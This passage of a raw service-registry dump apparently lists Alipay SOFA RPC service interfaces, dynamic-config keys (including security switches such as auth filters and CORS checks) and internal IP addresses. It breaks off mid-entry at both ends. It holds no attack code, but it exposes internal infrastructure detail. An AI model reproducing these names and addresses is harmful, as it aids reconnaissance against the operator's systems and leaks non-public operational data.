@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.BusinessNameService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniSubmitAuditEndManagerProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.giftpackage.SaleGiftPackageActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.156.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:transfercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.mds.MdsDataResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.MessageOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:patch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.paramTaskMS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.manage.ProductSyncTaskDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.64.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:codprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.61.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.ThemeModuleDrmResource.minGatewayReturnItemCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dont-load-plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapUserService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.246.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finauth.common.service.facade.insurance.service.InsuranceCertifyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.common.service.task.facade.TestMessageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mordercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.152.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.117.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebillcenter.common.service.facade.EbillDailyUserProfileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventRelatedEntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopOrderSettleSerive:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finloancore.p2p.service.facade.raise.api.P2pFinancingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.changeLogLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.api.EinvInvoiceAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordercore.mrch.common.service.emergency.api.PdUsageRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.TvmNoticeRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.couriercore.common.service.channel.UniformChannelManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.task.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencommon.rcache.facade.RCacheNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.ValidateResultSetupService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliyun.apsarabase.euler.meta.service.facade.api.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.v3.claim.InvestRouteForClaimQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffQrcodeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.TemplateService:1.0:templateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpdcenter.facade.mng.FundManagerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofaboot_webtest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskmng.common.service.facade.api.FinanceInvestigationPaidServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.SaleActivityOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-filecore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.uemprod.common.service.facade.cache.CacheManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.ResourceValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosec:name=com.alipay.infosec.biz.manager.drm.ChangeOrderDRMResource.open,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.189.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.caprod.service.feedback.facade.CertFeedbackInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.ResourceInstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:certs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotationCapitalFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecisionx.common.service.facade.auth.api.AssetAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.gfas.gfasShardingDataSource.groupLabelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:utraffictrip@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.FeatureHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-opendocstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.contentview.ContentViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.uctproc:name=com.alipay.analyze.core.scheduler.drm.UctSchedulerResource.taskSleepConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jarguard.facade.SchedulerTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.79.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jss.facade.service.openapi.TaskOpenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:groupFundsRefundLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:isecuritysimulate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_6200_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trafficsaas.common.service.facade.api.AlipayCertServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.30.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradequote.api.QuotationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterDecisionIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.PromoRecommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.core.service.limit.scure.DecisionExecutorCoordinator:1.0:defaultExecutorCoordinator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:distinguishprod_antprocess_join_verify_finish_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcache:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecquery.common.service.transaction.ComSubOrderResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.taobaocategory.TaoBaoCategoryAlipayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_PARKING_CAPITAL_CHANGE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.alphasec.compass.sanction.facade.SanctionFuseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","smamlmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.withdraw.api.WithdrawStateResolveService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-busitesttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.zoneListForRemoteCacheForRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkoyzcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:opswareextension@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_PRODMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.processmng.common.service.plugin.facade.PluginScriptService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloandecision.common.service.facade.consult.api.LoanSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.check.MerchandiseCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","securitydata.domain#@#DEFAULT_INSTANCE_ID#@#securitydata.server.group","com.alipay.pcreditprod.service.PcreditUserNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.audit.AuditProcessConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPSSLA#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchaincustomer.facade.api.customerfeedback.CustomerFeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.l2cache.L2CacheServerSwitch.profileStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.oceanbase.obforumcore.service.partner.PartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BKFM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenFeedFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthPageGridFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfortuneall.core.service.antuiauto.BucService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.RecallConfigCopyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.rcpStarWishAppId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.api.account.CfpAccountVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.PolicyConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.batchAuditSplitCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinpromo.common.service.facade.equity.EquityWriteOffRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.BizIdentityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.enumtemplate.ParmEnumQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.titan.dcc.biz.credit.drm.CreditConfigResource.creditAuthWhiteNameList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.bizrecon.ProductConfigManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.oyz.core.facade.api.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_RQ_Notify_1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:pricecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_close_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.130.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opinioncore.facade.yq.WeiboUidService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntAssistantCardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.doubleReadOb,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.community.api.forum.manager.ForumAdminManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.95.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.endpoint.plugin.openapi.CommonPublicApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.BackEndAdminDrm.exemptPrepaymentFeeInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbadvert.common.service.facade.api.MerchantItemSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceApiInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:lhc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.revtransTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.personalproxy.service.acctrans.AccountQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.25.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.aip.AipTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.spi.lottery.LotteryAccessFacade:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bcriskdecision.facade.api.publish.PublishServiceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0:antbuservice-global@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobenchFcProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.PurchaseLimitDrmImpl.userIDSuffix,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insproductcore.facade.service.InsFcProductQuery4MngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.165.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.WTCatQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.NewsfeedUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditamount.service.PcamMetaTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.defaultContractOperateTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditcore.deduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.WarningWhiteListDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.news.api.FinAdvisorNewsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.ExpressSignAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fundmanager.FundGroupManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimParticipantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.session.SessionRelationInternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ServerUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.asyncExecutor.clearingcenter.aysncExecutorCorePoolSize,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.124.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscene.common.service.facade.api.StrategyRecFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.callback.IsvTaskProcessCallback:1.0:openmonitorIsvTaskProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.api.ServiceProviderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.data.LifeDataConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.carrier.CarrierOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-kbtbcommontwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finecorisk.common.facade.service.api.schema.SchemaMgrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementQueryStdFacade:1.0:bankArrangementQueryStdFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwd4716.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.common.service.facade.manage.TaskManageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.tooOftenStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.ZoneRuleDrm.zoneList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.77.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebplus.common.facade.service.api.YebsAssetDisplayManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_FISCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fppolicy.service.widetable.FeatureAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.CaseModelRunFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.database.SchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.recommend.StockDiagnosisQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.BankCardQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.AutoInvestPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.msgnotifyservice.MsgProductConfServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zhubalipay.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradeasyn.service.facade.FundScheOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:selfcurealipayse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.AdjustLibraryManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcustsrv.facade.pcpay.api.PcreditUserTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zmcamng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:minitopbusiness@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.biz